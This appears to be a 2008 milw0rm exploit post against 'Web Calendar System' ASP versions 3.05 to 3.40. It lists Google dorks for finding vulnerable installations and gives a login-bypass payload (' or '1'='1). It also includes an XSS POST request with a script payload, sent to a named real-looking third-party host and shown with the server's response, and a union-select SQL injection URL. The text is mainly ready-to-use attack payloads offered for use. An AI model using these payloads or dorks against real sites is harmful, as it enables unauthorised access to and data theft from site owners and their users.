000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 [+] Script : Web Calendar System v 3.22/3.40/3.05/3.23 [+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection ) [+] Google Dork : intitle:Web Calendar system v 3.40 inurl:.asp [+] Google Dork : intitle:Web Calendar system v 3.22 inurl:.asp [+] Google Dork : intitle:Web Calendar system v 3.23 inurl:.asp [+] Google Dork : intitle:Web Calendar system v 3.05 inurl:.asp [+] Contact : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s --//--> Exploit : 1) Remote Bypass Exploit : http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM username:' or '1'='1 password:' or '1'='1 2) Remote XSS exploit : http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1 Host: www.southforkwatershed.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC Content-Type: application/x-www-form-urlencoded Content-Length: 55 SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E HTTP/1.x 200 OK Cache-Control: no-cache Date: Fri, 28 Nov 2008 11:45:08 GMT Pragma: no-cache Content-Type: text/html Expires: Fri, 28 Nov 2008 11:44:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Encoding: gzip Vary: Accept-Encoding Transfer-Encoding: chunked In simple words : POST : SText= 3) Remote SQL injection: http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects [peace xD] # milw0rm.com [2008-11-28]